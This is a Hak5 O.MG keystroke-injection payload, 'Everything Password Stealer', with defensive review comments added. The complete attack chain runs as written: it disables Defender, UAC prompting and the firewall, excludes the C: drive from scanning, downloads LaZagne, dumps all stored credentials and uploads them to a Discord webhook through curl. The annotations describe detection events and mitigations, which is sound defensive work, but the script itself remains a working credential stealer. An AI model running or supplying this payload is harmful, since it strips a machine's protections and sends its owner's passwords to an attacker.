mirror of https://github.com/hak5/omg-payloads.git
REM Title: Everything Password Stealer
REM Description: Steals every password on Windows 10 or 11 with LaZagne
REM Bypasses UAC, Firewall, and Defender, without persistence whatsoever
REM Exfil your data to your not-so private discord server with computer name as a filename (to avoid confusions as usual)
REM Author: DeadPool (just kidding, created by me, the one and only Spade)
REM
REM Review notes (defensive): this is a keystroke-injection sequence that first
REM weakens local protections through the Windows Security UI and an elevated
REM PowerShell, then downloads LaZagne, dumps credentials and posts the output to
REM a Discord webhook. Each stage is annotated below with the artifact it leaves
REM and the control that blocks it. Everything is DELAY-timed and driven through
REM the GUI, so it needs an unlocked interactive desktop, a user who can pass the
REM UAC consent prompt (presumably a local admin), and the exact default layout
REM of the Windows Security app. USB HID device control / allow-listing stops the
REM whole chain before the first keystroke.

REM Win+M minimizes every open window so the injected keys land on the desktop.
GUI m

DELAY 2000

REM Open Windows Defender Settings
REM Ctrl+Esc opens the Start menu; typing into it searches for the Windows Security app.
CTRL ESC

DELAY 750

STRING windows security

ENTER

DELAY 1500

ENTER

REM Navigate to Manage Settings
REM Four TABs plus ENTER are a positional walk through the app; any change to the
REM Windows Security layout (build, language, added tiles) silently breaks it.
DELAY 500

TAB

DELAY 100

TAB

DELAY 100

TAB

DELAY 100

TAB

DELAY 100

ENTER

DELAY 500

REM Open and turn off Realtime Protection
REM SPACE toggles the real-time protection switch; ALT y presumably answers the
REM UAC consent prompt that the toggle raises. Tamper Protection does NOT block a
REM change made through the Windows Security UI, which is why the author goes
REM through the app here rather than PowerShell. Defender records the change in
REM the Microsoft-Windows-Windows Defender/Operational log (event 5001,
REM real-time protection disabled) — a high-signal alert on any managed host.
SPACE

DELAY 1000

ALT y

DELAY 1000

REM Exit security settings
ALT F4

DELAY 3000

REM Win+R opens the Run dialog.
GUI r

DELAY 1000

REM Open the Powershell as Administrator
REM Ctrl+Shift+Enter from Run launches powershell elevated; ALT y accepts the UAC
REM prompt. On a standard-user account UAC asks for admin credentials instead, so
REM the payload stalls here — running daily accounts without local admin is the
REM cheapest mitigation for the rest of the script. Script Block Logging
REM (event 4104) captures every STRING line typed below in full.
STRING powershell

CTRL-SHIFT ENTER

DELAY 2000

ALT y

ENTER

DELAY 1000

REM Disabling the UAC
REM Sets ConsentPromptBehaviorAdmin=0 ("elevate without prompting" for admins);
REM UAC itself (EnableLUA) is not turned off. This key is covered by the CIS /
REM Microsoft security baselines and is a standard registry-audit target
REM (e.g. Sysmon event 13 on this value).
STRING Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0

ENTER

DELAY 1000

REM Disabling Defender real-time monitoring (the author labelled this "Firewall Part 1";
REM the command targets Microsoft Defender, not the firewall). Redundant with the UI
REM toggle above; with Tamper Protection enabled this Set-MpPreference call is rejected.
STRING Set-MpPreference -DisableRealtimeMonitoring $true

ENTER

DELAY 1000

REM Disabling the Firewall Part 2
REM Turns the host firewall off for all three profiles. The Windows Firewall
REM operational log records each profile change, and GPO-enforced firewall
REM settings are reapplied at the next policy refresh.
STRING Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

ENTER

DELAY 1000

REM Disabling the Virus and Threat Protection
REM Writes the DisableAntiSpyware policy value. Microsoft documents this value as
REM deprecated and no longer honoured by current Defender platforms when Tamper
REM Protection is on, so on an up-to-date host this line is expected to have no
REM effect beyond the registry-write telemetry it generates.
STRING New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force

ENTER

DELAY 1000

REM Excludes the entire C: drive from scanning. Exclusion changes are logged as a
REM Defender configuration change (event 5007); a drive-root exclusion is a
REM reliable detection rule on its own, and Tamper Protection for exclusions
REM (where in effect) blocks it.
STRING Add-MpPreference -ExclusionPath "C:"

ENTER

DELAY 3000

REM Resolves the machine-scope TEMP directory (typically under the Windows
REM directory) and fetches the LaZagne 2.4.5 release binary via BITS. Artifacts:
REM a BITS job in the Microsoft-Windows-Bits-Client/Operational log, egress to
REM github.com from powershell, and l.exe on disk. LaZagne is a widely
REM signatured tool, so if Defender is still functional the download is the
REM usual point of failure.
STRING $Test = [System.Environment]::GetEnvironmentVariable('TEMP','Machine');Start-BitsTransfer https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe -Destination "$Test/l.exe"; cd $Test

ENTER

REM Fixed 15 s wait for the download; on a slow link l.exe is not yet present and
REM the next line fails.
DELAY 15000

REM Runs LaZagne twice ("all", then "browsers"), writes the output to a file named
REM after the computer, and posts it as a multipart upload to a Discord webhook
REM with curl.exe. Detection: curl.exe spawned from an elevated powershell,
REM outbound POST to the Discord webhook domain (block or proxy-inspect it), and
REM the 4104 script block containing the full line. Forensics: $x is never
REM assigned, so the Remove-Item does not target $Test and the failure is hidden
REM by -ErrorAction SilentlyContinue — expect l.exe and the <computername>.txt
REM output to remain in the machine TEMP directory.
STRING .\l.exe all -vv > "$env:computername.txt"; .\l.exe browsers -vv >> "$env:computername.txt"; curl.exe [DISCORD WEBHOOK URL] -F "file1=@$Test/$env:computername.txt"; Remove-Item "$x/$env:computername.txt", "$x/l.exe" -Force -ErrorAction SilentlyContinue

ENTER

REM Closes the elevated PowerShell window; PowerShell transcription, if enabled,
REM keeps the full session.
STRING exit

ENTER

REM Done